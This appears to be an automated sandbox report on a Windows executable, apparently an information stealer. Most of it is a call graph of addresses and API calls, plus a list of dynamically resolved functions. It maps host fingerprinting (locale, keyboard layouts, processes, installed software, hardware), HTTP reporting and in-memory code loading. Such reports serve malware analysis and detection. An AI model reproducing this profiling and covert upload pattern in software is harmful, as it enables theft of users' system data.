14917->14918 14919 dc5ee7 14918->14919 14920 dc5ef0 lstrlen 14919->14920 14921 dc5f03 14920->14921 14922 dc5f1a lstrlen 14921->14922 15710 ddaad0 14922->15710 14924 dc5f2a HttpSendRequestA 14925 dc5f35 InternetReadFile 14924->14925 14926 dc5f6a InternetCloseHandle 14925->14926 14930 dc5f61 14925->14930 14926->14851 14928 dda9b0 4 API calls 14928->14930 14929 dda8a0 lstrcpy 14929->14930 14930->14925 14930->14926 14930->14928 14930->14929 14933 dd1077 14931->14933 14932 dd1151 14932->13702 14933->14932 14934 dda820 lstrlen lstrcpy 14933->14934 14934->14933 14937 dd0db7 14935->14937 14936 dd0f17 14936->13710 14937->14936 14938 dd0ea4 StrCmpCA 14937->14938 14939 dd0e27 StrCmpCA 14937->14939 14940 dd0e67 StrCmpCA 14937->14940 14941 dda820 lstrlen lstrcpy 14937->14941 14938->14937 14939->14937 14940->14937 14941->14937 14943 dd0f67 14942->14943 14944 dd1044 14943->14944 14945 dd0fb2 StrCmpCA 14943->14945 14946 dda820 lstrlen lstrcpy 14943->14946 14944->13718 14945->14943 14946->14943 14948 dda740 lstrcpy 14947->14948 14949 dd1a26 14948->14949 14950 dda9b0 4 API calls 14949->14950 14951 dd1a37 14950->14951 14952 dda8a0 lstrcpy 14951->14952 14953 dd1a40 14952->14953 14954 dda9b0 4 API calls 14953->14954 14955 dd1a5b 14954->14955 14956 dda8a0 lstrcpy 14955->14956 14957 dd1a64 14956->14957 14958 dda9b0 4 API calls 14957->14958 14959 dd1a7d 14958->14959 14960 dda8a0 lstrcpy 14959->14960 14961 dd1a86 14960->14961 14962 dda9b0 4 API calls 14961->14962 14963 dd1aa1 14962->14963 14964 dda8a0 lstrcpy 14963->14964 14965 dd1aaa 14964->14965 14966 dda9b0 4 API calls 14965->14966 14967 dd1ac3 14966->14967 14968 dda8a0 lstrcpy 14967->14968 14969 dd1acc 14968->14969 14970 dda9b0 4 API calls 14969->14970 14971 dd1ae7 14970->14971 14972 dda8a0 lstrcpy 14971->14972 14973 dd1af0 14972->14973 14974 dda9b0 4 API calls 14973->14974 14975 dd1b09 14974->14975 14976 dda8a0 lstrcpy 14975->14976 14977 dd1b12 14976->14977 14978 dda9b0 4 API calls 14977->14978 14979 dd1b2d 14978->14979 14980 dda8a0 lstrcpy 14979->14980 14981 dd1b36 14980->14981 14982 dda9b0 4 API calls 14981->14982 14983 dd1b4f 14982->14983 14984 dda8a0 lstrcpy 14983->14984 14985 dd1b58 14984->14985 14986 dda9b0 4 API calls 14985->14986 14987 dd1b76 14986->14987 14988 dda8a0 lstrcpy 14987->14988 14989 dd1b7f 14988->14989 14990 dd7500 6 API calls 14989->14990 14991 dd1b96 14990->14991 14992 dda920 3 API calls 14991->14992 14993 dd1ba9 14992->14993 14994 dda8a0 lstrcpy 14993->14994 14995 dd1bb2 14994->14995 14996 dda9b0 4 API calls 14995->14996 14997 dd1bdc 14996->14997 14998 dda8a0 lstrcpy 14997->14998 14999 dd1be5 14998->14999 15000 dda9b0 4 API calls 14999->15000 15001 dd1c05 15000->15001 15002 dda8a0 lstrcpy 15001->15002 15003 dd1c0e 15002->15003 15711 dd7690 GetProcessHeap RtlAllocateHeap 15003->15711 15006 dda9b0 4 API calls 15007 dd1c2e 15006->15007 15008 dda8a0 lstrcpy 15007->15008 15009 dd1c37 15008->15009 15010 dda9b0 4 API calls 15009->15010 15011 dd1c56 15010->15011 15012 dda8a0 lstrcpy 15011->15012 15013 dd1c5f 15012->15013 15014 dda9b0 4 API calls 15013->15014 15015 dd1c80 15014->15015 15016 dda8a0 lstrcpy 15015->15016 15017 dd1c89 15016->15017 15718 dd77c0 GetCurrentProcess IsWow64Process 15017->15718 15020 dda9b0 4 API calls 15021 dd1ca9 15020->15021 15022 dda8a0 lstrcpy 15021->15022 15023 dd1cb2 15022->15023 15024 dda9b0 4 API calls 15023->15024 15025 dd1cd1 15024->15025 15026 dda8a0 lstrcpy 15025->15026 15027 dd1cda 15026->15027 15028 dda9b0 4 API calls 15027->15028 15029 dd1cfb 15028->15029 15030 dda8a0 lstrcpy 15029->15030 15031 dd1d04 15030->15031 15032 dd7850 3 API calls 15031->15032 15033 dd1d14 15032->15033 15034 dda9b0 4 API calls 15033->15034 15035 dd1d24 15034->15035 15036 dda8a0 lstrcpy 15035->15036 15037 dd1d2d 15036->15037 15038 dda9b0 4 API calls 15037->15038 15039 dd1d4c 15038->15039 15040 dda8a0 lstrcpy 15039->15040 15041 dd1d55 15040->15041 15042 dda9b0 4 API calls 15041->15042 15043 dd1d75 15042->15043 15044 dda8a0 lstrcpy 15043->15044 15045 dd1d7e 15044->15045 15046 dd78e0 3 API calls 15045->15046 15047 dd1d8e 15046->15047 15048 dda9b0 4 API calls 15047->15048 15049 dd1d9e 15048->15049 15050 dda8a0 lstrcpy 15049->15050 15051 dd1da7 15050->15051 15052 dda9b0 4 API calls 15051->15052 15053 dd1dc6 15052->15053 15054 dda8a0 lstrcpy 15053->15054 15055 dd1dcf 15054->15055 15056 dda9b0 4 API calls 15055->15056 15057 dd1df0 15056->15057 15058 dda8a0 lstrcpy 15057->15058 15059 dd1df9 15058->15059 15720 dd7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15059->15720 15062 dda9b0 4 API calls 15063 dd1e19 15062->15063 15064 dda8a0 lstrcpy 15063->15064 15065 dd1e22 15064->15065 15066 dda9b0 4 API calls 15065->15066 15067 dd1e41 15066->15067 15068 dda8a0 lstrcpy 15067->15068 15069 dd1e4a 15068->15069 15070 dda9b0 4 API calls 15069->15070 15071 dd1e6b 15070->15071 15072 dda8a0 lstrcpy 15071->15072 15073 dd1e74 15072->15073 15722 dd7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15073->15722 15076 dda9b0 4 API calls 15077 dd1e94 15076->15077 15078 dda8a0 lstrcpy 15077->15078 15079 dd1e9d 15078->15079 15080 dda9b0 4 API calls 15079->15080 15081 dd1ebc 15080->15081 15082 dda8a0 lstrcpy 15081->15082 15083 dd1ec5 15082->15083 15084 dda9b0 4 API calls 15083->15084 15085 dd1ee5 15084->15085 15086 dda8a0 lstrcpy 15085->15086 15087 dd1eee 15086->15087 15725 dd7b00 GetUserDefaultLocaleName 15087->15725 15090 dda9b0 4 API calls 15091 dd1f0e 15090->15091 15092 dda8a0 lstrcpy 15091->15092 15093 dd1f17 15092->15093 15094 dda9b0 4 API calls 15093->15094 15095 dd1f36 15094->15095 15096 dda8a0 lstrcpy 15095->15096 15097 dd1f3f 15096->15097 15098 dda9b0 4 API calls 15097->15098 15099 dd1f60 15098->15099 15100 dda8a0 lstrcpy 15099->15100 15101 dd1f69 15100->15101 15729 dd7b90 15101->15729 15103 dd1f80 15104 dda920 3 API calls 15103->15104 15105 dd1f93 15104->15105 15106 dda8a0 lstrcpy 15105->15106 15107 dd1f9c 15106->15107 15108 dda9b0 4 API calls 15107->15108 15109 dd1fc6 15108->15109 15110 dda8a0 lstrcpy 15109->15110 15111 dd1fcf 15110->15111 15112 dda9b0 4 API calls 15111->15112 15113 dd1fef 15112->15113 15114 dda8a0 lstrcpy 15113->15114 15115 dd1ff8 15114->15115 15741 dd7d80 GetSystemPowerStatus 15115->15741 15118 dda9b0 4 API calls 15119 dd2018 15118->15119 15120 dda8a0 lstrcpy 15119->15120 15121 dd2021 15120->15121 15122 dda9b0 4 API calls 15121->15122 15123 dd2040 15122->15123 15124 dda8a0 lstrcpy 15123->15124 15125 dd2049 15124->15125 15126 dda9b0 4 API calls 15125->15126 15127 dd206a 15126->15127 15128 dda8a0 lstrcpy 15127->15128 15129 dd2073 15128->15129 15130 dd207e GetCurrentProcessId 15129->15130 15743 dd9470 OpenProcess 15130->15743 15133 dda920 3 API calls 15134 dd20a4 15133->15134 15135 dda8a0 lstrcpy 15134->15135 15136 dd20ad 15135->15136 15137 dda9b0 4 API calls 15136->15137 15138 dd20d7 15137->15138 15139 dda8a0 lstrcpy 15138->15139 15140 dd20e0 15139->15140 15141 dda9b0 4 API calls 15140->15141 15142 dd2100 15141->15142 15143 dda8a0 lstrcpy 15142->15143 15144 dd2109 15143->15144 15748 dd7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15144->15748 15147 dda9b0 4 API calls 15148 dd2129 15147->15148 15149 dda8a0 lstrcpy 15148->15149 15150 dd2132 15149->15150 15151 dda9b0 4 API calls 15150->15151 15152 dd2151 15151->15152 15153 dda8a0 lstrcpy 15152->15153 15154 dd215a 15153->15154 15155 dda9b0 4 API calls 15154->15155 15156 dd217b 15155->15156 15157 dda8a0 lstrcpy 15156->15157 15158 dd2184 15157->15158 15752 dd7f60 15158->15752 15161 dda9b0 4 API calls 15162 dd21a4 15161->15162 15163 dda8a0 lstrcpy 15162->15163 15164 dd21ad 15163->15164 15165 dda9b0 4 API calls 15164->15165 15166 dd21cc 15165->15166 15167 dda8a0 lstrcpy 15166->15167 15168 dd21d5 15167->15168 15169 dda9b0 4 API calls 15168->15169 15170 dd21f6 15169->15170 15171 dda8a0 lstrcpy 15170->15171 15172 dd21ff 15171->15172 15765 dd7ed0 GetSystemInfo wsprintfA 15172->15765 15175 dda9b0 4 API calls 15176 dd221f 15175->15176 15177 dda8a0 lstrcpy 15176->15177 15178 dd2228 15177->15178 15179 dda9b0 4 API calls 15178->15179 15180 dd2247 15179->15180 15181 dda8a0 lstrcpy 15180->15181 15182 dd2250 15181->15182 15183 dda9b0 4 API calls 15182->15183 15184 dd2270 15183->15184 15185 dda8a0 lstrcpy 15184->15185 15186 dd2279 15185->15186 15767 dd8100 GetProcessHeap RtlAllocateHeap 15186->15767 15189 dda9b0 4 API calls 15190 dd2299 15189->15190 15191 dda8a0 lstrcpy 15190->15191 15192 dd22a2 15191->15192 15193 dda9b0 4 API calls 15192->15193 15194 dd22c1 15193->15194 15195 dda8a0 lstrcpy 15194->15195 15196 dd22ca 15195->15196 15197 dda9b0 4 API calls 15196->15197 15198 dd22eb 15197->15198 15199 dda8a0 lstrcpy 15198->15199 15200 dd22f4 15199->15200 15773 dd87c0 15200->15773 15203 dda920 3 API calls 15204 dd231e 15203->15204 15205 dda8a0 lstrcpy 15204->15205 15206 dd2327 15205->15206 15207 dda9b0 4 API calls 15206->15207 15208 dd2351 15207->15208 15209 dda8a0 lstrcpy 15208->15209 15210 dd235a 15209->15210 15211 dda9b0 4 API calls 15210->15211 15212 dd237a 15211->15212 15213 dda8a0 lstrcpy 15212->15213 15214 dd2383 15213->15214 15215 dda9b0 4 API calls 15214->15215 15216 dd23a2 15215->15216 15217 dda8a0 lstrcpy 15216->15217 15218 dd23ab 15217->15218 15778 dd81f0 15218->15778 15220 dd23c2 15221 dda920 3 API calls 15220->15221 15222 dd23d5 15221->15222 15223 dda8a0 lstrcpy 15222->15223 15224 dd23de 15223->15224 15225 dda9b0 4 API calls 15224->15225 15226 dd240a 15225->15226 15227 dda8a0 lstrcpy 15226->15227 15228 dd2413 15227->15228 15229 dda9b0 4 API calls 15228->15229 15230 dd2432 15229->15230 15231 dda8a0 lstrcpy 15230->15231 15232 dd243b 15231->15232 15233 dda9b0 4 API calls 15232->15233 15234 dd245c 15233->15234 15235 dda8a0 lstrcpy 15234->15235 15236 dd2465 15235->15236 15237 dda9b0 4 API calls 15236->15237 15238 dd2484 15237->15238 15239 dda8a0 lstrcpy 15238->15239 15240 dd248d 15239->15240 15241 dda9b0 4 API calls 15240->15241 15242 dd24ae 15241->15242 15243 dda8a0 lstrcpy 15242->15243 15244 dd24b7 15243->15244 15786 dd8320 15244->15786 15246 dd24d3 15247 dda920 3 API calls 15246->15247 15248 dd24e6 15247->15248 15249 dda8a0 lstrcpy 15248->15249 15250 dd24ef 15249->15250 15251 dda9b0 4 API calls 15250->15251 15252 dd2519 15251->15252 15253 dda8a0 lstrcpy 15252->15253 15254 dd2522 15253->15254 15255 dda9b0 4 API calls 15254->15255 15256 dd2543 15255->15256 15257 dda8a0 lstrcpy 15256->15257 15258 dd254c 15257->15258 15259 dd8320 17 API calls 15258->15259 15260 dd2568 15259->15260 15261 dda920 3 API calls 15260->15261 15262 dd257b 15261->15262 15263 dda8a0 lstrcpy 15262->15263 15264 dd2584 15263->15264 15265 dda9b0 4 API calls 15264->15265 15266 dd25ae 15265->15266 15267 dda8a0 lstrcpy 15266->15267 15268 dd25b7 15267->15268 15269 dda9b0 4 API calls 15268->15269 15270 dd25d6 15269->15270 15271 dda8a0 lstrcpy 15270->15271 15272 dd25df 15271->15272 15273 dda9b0 4 API calls 15272->15273 15274 dd2600 15273->15274 15275 dda8a0 lstrcpy 15274->15275 15276 dd2609 15275->15276 15822 dd8680 15276->15822 15278 dd2620 15279 dda920 3 API calls 15278->15279 15280 dd2633 15279->15280 15281 dda8a0 lstrcpy 15280->15281 15282 dd263c 15281->15282 15283 dd265a lstrlen 15282->15283 15284 dd266a 15283->15284 15285 dda740 lstrcpy 15284->15285 15286 dd267c 15285->15286 15287 dc1590 lstrcpy 15286->15287 15288 dd268d 15287->15288 15832 dd5190 15288->15832 15290 dd2699 15290->13722 16020 ddaad0 15291->16020 15293 dc5009 InternetOpenUrlA 15296 dc5021 15293->15296 15294 dc502a InternetReadFile 15294->15296 15295 dc50a0 InternetCloseHandle InternetCloseHandle 15297 dc50ec 15295->15297 15296->15294 15296->15295 15297->13726 16021 dc98d0 15298->16021 15300 dd0759 15301 dd077d 15300->15301 15302 dd0a38 15300->15302 15304 dd0799 StrCmpCA 15301->15304 15303 dc1590 lstrcpy 15302->15303 15305 dd0a49 15303->15305 15306 dd07a8 15304->15306 15335 dd0843 15304->15335 16197 dd0250 15305->16197 15308 dda7a0 lstrcpy 15306->15308 15310 dd07c3 15308->15310 15313 dc1590 lstrcpy 15310->15313 15311 dd0865 StrCmpCA 15312 dd0874 15311->15312 15316 dd096b 15311->15316 15314 dda740 lstrcpy 15312->15314 15315 dd080c 15313->15315 15318 dd0881 15314->15318 15319 dda7a0 lstrcpy 15315->15319 15317 dd099c StrCmpCA 15316->15317 15320 dd09ab 15317->15320 15321 dd0a2d 15317->15321 15322 dda9b0 4 API calls 15318->15322 15323 dd0823 15319->15323 15324 dc1590 lstrcpy 15320->15324 15321->13730 15325 dd08ac 15322->15325 15326 dda7a0 lstrcpy 15323->15326 15327 dd09f4 15324->15327 15328 dda920 3 API calls 15325->15328 15329 dd083e 15326->15329 15330 dda7a0 lstrcpy 15327->15330 15331 dd08b3 15328->15331 16024 dcfb00 15329->16024 15333 dd0a0d 15330->15333 15334 dda9b0 4 API calls 15331->15334 15336 dda7a0 lstrcpy 15333->15336 15337 dd08ba 15334->15337 15335->15311 15338 dd0a28 15336->15338 15339 dda8a0 lstrcpy 15337->15339 16140 dd0030 15338->16140 15672 dda7a0 lstrcpy 15671->15672 15673 dc1683 15672->15673 15674 dda7a0 lstrcpy 15673->15674 15675 dc1695 15674->15675 15676 dda7a0 lstrcpy 15675->15676 15677 dc16a7 15676->15677 15678 dda7a0 lstrcpy 15677->15678 15679 dc15a3 15678->15679 15679->14553 15681 dc47c6 15680->15681 15682 dc4838 lstrlen 15681->15682 15706 ddaad0 15682->15706 15684 dc4848 InternetCrackUrlA 15685 dc4867 15684->15685 15685->14630 15687 dda740 lstrcpy 15686->15687 15688 dd8b74 15687->15688 15689 dda740 lstrcpy 15688->15689 15690 dd8b82 GetSystemTime 15689->15690 15691 dd8b99 15690->15691 15692 dda7a0 lstrcpy 15691->15692 15693 dd8bfc 15692->15693 15693->14645 15696 dda931 15694->15696 15695 dda988 15697 dda7a0 lstrcpy 15695->15697 15696->15695 15698 dda968 lstrcpy lstrcat 15696->15698 15699 dda994 15697->15699 15698->15695 15699->14649 15700->14763 15702 dc9af9 LocalAlloc 15701->15702 15703 dc4eee 15701->15703 15702->15703 15704 dc9b14 CryptStringToBinaryA 15702->15704 15703->14651 15703->14654 15704->15703 15705 dc9b39 LocalFree 15704->15705 15705->15703 15706->15684 15707->14773 15708->14914 15709->14916 15710->14924 15839 dd77a0 15711->15839 15714 dd1c1e 15714->15006 15715 dd76c6 RegOpenKeyExA 15716 dd7704 RegCloseKey 15715->15716 15717 dd76e7 RegQueryValueExA 15715->15717 15716->15714 15717->15716 15719 dd1c99 15718->15719 15719->15020 15721 dd1e09 15720->15721 15721->15062 15723 dd7a9a wsprintfA 15722->15723 15724 dd1e84 15722->15724 15723->15724 15724->15076 15726 dd7b4d 15725->15726 15727 dd1efe 15725->15727 15846 dd8d20 LocalAlloc CharToOemW 15726->15846 15727->15090 15730 dda740 lstrcpy 15729->15730 15731 dd7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15730->15731 15740 dd7c25 15731->15740 15732 dd7d18 15734 dd7d1e LocalFree 15732->15734 15735 dd7d28 15732->15735 15733 dd7c46 GetLocaleInfoA 15733->15740 15734->15735 15736 dda7a0 lstrcpy 15735->15736 15739 dd7d37 15736->15739 15737 dda8a0 lstrcpy 15737->15740 15738 dda9b0 lstrcpy lstrlen lstrcpy lstrcat 15738->15740 15739->15103 15740->15732 15740->15733 15740->15737 15740->15738 15742 dd2008 15741->15742 15742->15118 15744 dd94b5 15743->15744 15745 dd9493 GetModuleFileNameExA CloseHandle 15743->15745 15746 dda740 lstrcpy 15744->15746 15745->15744 15747 dd2091 15746->15747 15747->15133 15749 dd7e68 RegQueryValueExA 15748->15749 15750 dd2119 15748->15750 15751 dd7e8e RegCloseKey 15749->15751 15750->15147 15751->15750 15753 dd7fb9 GetLogicalProcessorInformationEx 15752->15753 15754 dd7fd8 GetLastError 15753->15754 15760 dd8029 15753->15760 15763 dd8022 15754->15763 15764 dd7fe3 15754->15764 15756 dd2194 15756->15161 15758 dd89f0 2 API calls 15761 dd807b 15758->15761 15759 dd89f0 2 API calls 15759->15756 15760->15758 15762 dd8084 wsprintfA 15761->15762 15761->15763 15762->15756 15763->15756 15763->15759 15764->15753 15764->15756 15847 dd89f0 15764->15847 15850 dd8a10 GetProcessHeap RtlAllocateHeap 15764->15850 15766 dd220f 15765->15766 15766->15175 15768 dd89b0 15767->15768 15769 dd814d GlobalMemoryStatusEx 15768->15769 15770 dd8163 15769->15770 15771 dd819b wsprintfA 15770->15771 15772 dd2289 15771->15772 15772->15189 15774 dd87fb GetProcessHeap RtlAllocateHeap wsprintfA 15773->15774 15776 dda740 lstrcpy 15774->15776 15777 dd230b 15776->15777 15777->15203 15779 dda740 lstrcpy 15778->15779 15780 dd8229 15779->15780 15781 dd8263 15780->15781 15784 dda9b0 lstrcpy lstrlen lstrcpy lstrcat 15780->15784 15785 dda8a0 lstrcpy 15780->15785 15782 dda7a0 lstrcpy 15781->15782 15783 dd82dc 15782->15783 15783->15220 15784->15780 15785->15780 15787 dda740 lstrcpy 15786->15787 15788 dd835c RegOpenKeyExA 15787->15788 15789 dd83ae 15788->15789 15790 dd83d0 15788->15790 15791 dda7a0 lstrcpy 15789->15791 15792 dd83f8 RegEnumKeyExA 15790->15792 15793 dd8613 RegCloseKey 15790->15793 15802 dd83bd 15791->15802 15795 dd843f wsprintfA RegOpenKeyExA 15792->15795 15796 dd860e 15792->15796 15794 dda7a0 lstrcpy 15793->15794 15794->15802 15797 dd8485 RegCloseKey RegCloseKey 15795->15797 15798 dd84c1 RegQueryValueExA 15795->15798 15796->15793 15801 dda7a0 lstrcpy 15797->15801 15799 dd84fa lstrlen 15798->15799 15800 dd8601 RegCloseKey 15798->15800 15799->15800 15803 dd8510 15799->15803 15800->15796 15801->15802 15802->15246 15804 dda9b0 4 API calls 15803->15804 15805 dd8527 15804->15805 15806 dda8a0 lstrcpy 15805->15806 15807 dd8533 15806->15807 15808 dda9b0 4 API calls 15807->15808 15809 dd8557 15808->15809 15810 dda8a0 lstrcpy 15809->15810 15811 dd8563 15810->15811 15812 dd856e RegQueryValueExA 15811->15812 15812->15800 15813 dd85a3 15812->15813 15814 dda9b0 4 API calls 15813->15814 15815 dd85ba 15814->15815 15816 dda8a0 lstrcpy 15815->15816 15817 dd85c6 15816->15817 15818 dda9b0 4 API calls 15817->15818 15819 dd85ea 15818->15819 15820 dda8a0 lstrcpy 15819->15820 15821 dd85f6 15820->15821 15821->15800 15823 dda740 lstrcpy 15822->15823 15824 dd86bc CreateToolhelp32Snapshot Process32First 15823->15824 15825 dd875d CloseHandle 15824->15825 15826 dd86e8 Process32Next 15824->15826 15827 dda7a0 lstrcpy 15825->15827 15826->15825 15830 dd86fd 15826->15830 15829 dd8776 15827->15829 15828 dda9b0 lstrcpy lstrlen lstrcpy lstrcat 15828->15830 15829->15278 15830->15826 15830->15828 15831 dda8a0 lstrcpy 15830->15831 15831->15830 15833 dda7a0 lstrcpy 15832->15833 15834 dd51b5 15833->15834 15835 dc1590 lstrcpy 15834->15835 15836 dd51c6 15835->15836 15851 dc5100 15836->15851 15838 dd51cf 15838->15290 15842 dd7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15839->15842 15841 dd76b9 15841->15714 15841->15715 15843 dd7765 RegQueryValueExA 15842->15843 15844 dd7780 RegCloseKey 15842->15844 15843->15844 15845 dd7793 15844->15845 15845->15841 15846->15727 15848 dd8a0c 15847->15848 15849 dd89f9 GetProcessHeap HeapFree 15847->15849 15848->15764 15849->15848 15850->15764 15852 dda7a0 lstrcpy 15851->15852 15853 dc5119 15852->15853 15854 dc47b0 2 API calls 15853->15854 15855 dc5125 15854->15855 16011 dd8ea0 15855->16011 15857 dc5184 15858 dc5192 lstrlen 15857->15858 15859 dc51a5 15858->15859 15860 dd8ea0 4 API calls 15859->15860 15861 dc51b6 15860->15861 15862 dda740 lstrcpy 15861->15862 15863 dc51c9 15862->15863 15864 dda740 lstrcpy 15863->15864 15865 dc51d6 15864->15865 15866 dda740 lstrcpy 15865->15866 15867 dc51e3 15866->15867 15868 dda740 lstrcpy 15867->15868 15869 dc51f0 15868->15869 15870 dda740 lstrcpy 15869->15870 15871 dc51fd InternetOpenA StrCmpCA 15870->15871 15872 dc522f 15871->15872 15873 dc58c4 InternetCloseHandle 15872->15873 15874 dd8b60 3 API calls 15872->15874 15880 dc58d9 codecvt 15873->15880 15875 dc524e 15874->15875 15876 dda920 3 API calls 15875->15876 15877 dc5261 15876->15877 15878 dda8a0 lstrcpy 15877->15878 15879 dc526a 15878->15879 15881 dda9b0 4 API calls 15879->15881 15884 dda7a0 lstrcpy 15880->15884 15882 dc52ab 15881->15882 15883 dda920 3 API calls 15882->15883 15885 dc52b2 15883->15885 15892 dc5913 15884->15892 15886 dda9b0 4 API calls 15885->15886 15887 dc52b9 15886->15887 15888 dda8a0 lstrcpy 15887->15888 15889 dc52c2 15888->15889 15890 dda9b0 4 API calls 15889->15890 15891 dc5303 15890->15891 15893 dda920 3 API calls 15891->15893 15892->15838 15894 dc530a 15893->15894 15895 dda8a0 lstrcpy 15894->15895 15896 dc5313 15895->15896 15897 dc5329 InternetConnectA 15896->15897 15897->15873 15898 dc5359 HttpOpenRequestA 15897->15898 15900 dc58b7 InternetCloseHandle 15898->15900 15901 dc53b7 15898->15901 15900->15873 15902 dda9b0 4 API calls 15901->15902 15903 dc53cb 15902->15903 15904 dda8a0 lstrcpy 15903->15904 15905 dc53d4 15904->15905 15906 dda920 3 API calls 15905->15906 15907 dc53f2 15906->15907 15908 dda8a0 lstrcpy 15907->15908 15909 dc53fb 15908->15909 15910 dda9b0 4 API calls 15909->15910 15911 dc541a 15910->15911 15912 dda8a0 lstrcpy 15911->15912 15913 dc5423 15912->15913 15914 dda9b0 4 API calls 15913->15914 15915 dc5444 15914->15915 15916 dda8a0 lstrcpy 15915->15916 15917 dc544d 15916->15917 15918 dda9b0 4 API calls 15917->15918 15919 dc546e 15918->15919 15920 dda8a0 lstrcpy 15919->15920 15921 dc5477 15920->15921 16012 dd8ead CryptBinaryToStringA 16011->16012 16013 dd8ea9 16011->16013 16012->16013 16014 dd8ece GetProcessHeap RtlAllocateHeap 16012->16014 16013->15857 16014->16013 16015 dd8ef4 codecvt 16014->16015 16016 dd8f05 CryptBinaryToStringA 16015->16016 16016->16013 16020->15293 16263 dc9880 16021->16263 16023 dc98e1 16023->15300 16025 dda740 lstrcpy 16024->16025 16026 dcfb16 16025->16026 16198 dda740 lstrcpy 16197->16198 16199 dd0266 16198->16199 16200 dd8de0 2 API calls 16199->16200 16201 dd027b 16200->16201 16202 dda920 3 API calls 16201->16202 16203 dd028b 16202->16203 16204 dda8a0 lstrcpy 16203->16204 16205 dd0294 16204->16205 16206 dda9b0 4 API calls 16205->16206 16207 dd02b8 16206->16207 16264 dc988e 16263->16264 16267 dc6fb0 16264->16267 16266 dc98ad codecvt 16266->16023 16270 dc6d40 16267->16270 16271 dc6d63 16270->16271 16283 dc6d59 16270->16283 16271->16283 16284 dc6660 16271->16284 16273 dc6dbe 16273->16283 16290 dc69b0 16273->16290 16275 dc6e2a 16276 dc6ee6 VirtualFree 16275->16276 16278 dc6ef7 16275->16278 16275->16283 16276->16278 16277 dc6f41 16279 dd89f0 2 API calls 16277->16279 16277->16283 16278->16277 16280 dc6f38 16278->16280 16281 dc6f26 FreeLibrary 16278->16281 16279->16283 16282 dd89f0 2 API calls 16280->16282 16281->16278 16282->16277 16283->16266 16287 dc668f VirtualAlloc 16284->16287 16286 dc6730 16288 dc673c 16286->16288 16289 dc6743 VirtualAlloc 16286->16289 16287->16286 16287->16288 16288->16273 16289->16288 16291 dc69c9 16290->16291 16295 dc69d5 16290->16295 16292 dc6a09 LoadLibraryA 16291->16292 16291->16295 16293 dc6a32 16292->16293 16292->16295 16296 dc6ae0 16293->16296 16300 dd8a10 GetProcessHeap RtlAllocateHeap 16293->16300 16295->16275 16296->16295 16298 dc6ba8 GetProcAddress 16296->16298 16297 dc6a8b 16297->16295 16299 dd89f0 2 API calls 16297->16299 16298->16295 16298->16296 16299->16296 16300->16297

                                Executed Functions

                                Function 00DD9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 dd9860-dd9874 call dd9750 663 dd987a-dd9a8e call dd9780 GetProcAddress * 21 660->663 664 dd9a93-dd9af2 LoadLibraryA * 5 660->664 663->664 666 dd9b0d-dd9b14 664->666 667 dd9af4-dd9b08 GetProcAddress 664->667 669 dd9b46-dd9b4d 666->669 670 dd9b16-dd9b41 GetProcAddress * 2 666->670 667->666 671 dd9b4f-dd9b63 GetProcAddress 669->671 672 dd9b68-dd9b6f 669->672 670->669 671->672 673 dd9b89-dd9b90 672->673 674 dd9b71-dd9b84 GetProcAddress 672->674 675 dd9bc1-dd9bc2 673->675 676 dd9b92-dd9bbc GetProcAddress * 2 673->676 674->673 676->675
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,01622470), ref: 00DD98A1
                                • GetProcAddress.KERNEL32(74DD0000,016222F0), ref: 00DD98BA
                                • GetProcAddress.KERNEL32(74DD0000,01622290), ref: 00DD98D2
                                • GetProcAddress.KERNEL32(74DD0000,016223E0), ref: 00DD98EA
                                • GetProcAddress.KERNEL32(74DD0000,016224A0), ref: 00DD9903
                                • GetProcAddress.KERNEL32(74DD0000,01628F38), ref: 00DD991B
                                • GetProcAddress.KERNEL32(74DD0000,01615910), ref: 00DD9933
                                • GetProcAddress.KERNEL32(74DD0000,01615930), ref: 00DD994C
                                • GetProcAddress.KERNEL32(74DD0000,01622218), ref: 00DD9964
                                • GetProcAddress.KERNEL32(74DD0000,016223B0), ref: 00DD997C
                                • GetProcAddress.KERNEL32(74DD0000,01622320), ref: 00DD9995
                                • GetProcAddress.KERNEL32(74DD0000,01622440), ref: 00DD99AD
                                • GetProcAddress.KERNEL32(74DD0000,016159B0), ref: 00DD99C5
                                • GetProcAddress.KERNEL32(74DD0000,016222A8), ref: 00DD99DE
                                • GetProcAddress.KERNEL32(74DD0000,01622338), ref: 00DD99F6
                                • GetProcAddress.KERNEL32(74DD0000,016156F0), ref: 00DD9A0E
                                • GetProcAddress.KERNEL32(74DD0000,01622428), ref: 00DD9A27
                                • GetProcAddress.KERNEL32(74DD0000,016223F8), ref: 00DD9A3F
                                • GetProcAddress.KERNEL32(74DD0000,016158D0), ref: 00DD9A57
                                • GetProcAddress.KERNEL32(74DD0000,016222D8), ref: 00DD9A70
                                • GetProcAddress.KERNEL32(74DD0000,016159D0), ref: 00DD9A88
                                • LoadLibraryA.KERNEL32(01622350,?,00DD6A00), ref: 00DD9A9A
                                • LoadLibraryA.KERNEL32(01622368,?,00DD6A00), ref: 00DD9AAB
                                • LoadLibraryA.KERNEL32(016223C8,?,00DD6A00), ref: 00DD9ABD
                                • LoadLibraryA.KERNEL32(01622410,?,00DD6A00), ref: 00DD9ACF
                                • LoadLibraryA.KERNEL32(01622458,?,00DD6A00), ref: 00DD9AE0
                                • GetProcAddress.KERNEL32(75A70000,016224B8), ref: 00DD9B02
                                • GetProcAddress.KERNEL32(75290000,016224D0), ref: 00DD9B23
                                • GetProcAddress.KERNEL32(75290000,016224E8), ref: 00DD9B3B
                                • GetProcAddress.KERNEL32(75BD0000,01622230), ref: 00DD9B5D
                                • GetProcAddress.KERNEL32(75450000,01615A50), ref: 00DD9B7E
                                • GetProcAddress.KERNEL32(76E90000,01629018), ref: 00DD9B9F
                                • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00DD9BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00DD9BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmpDownload File
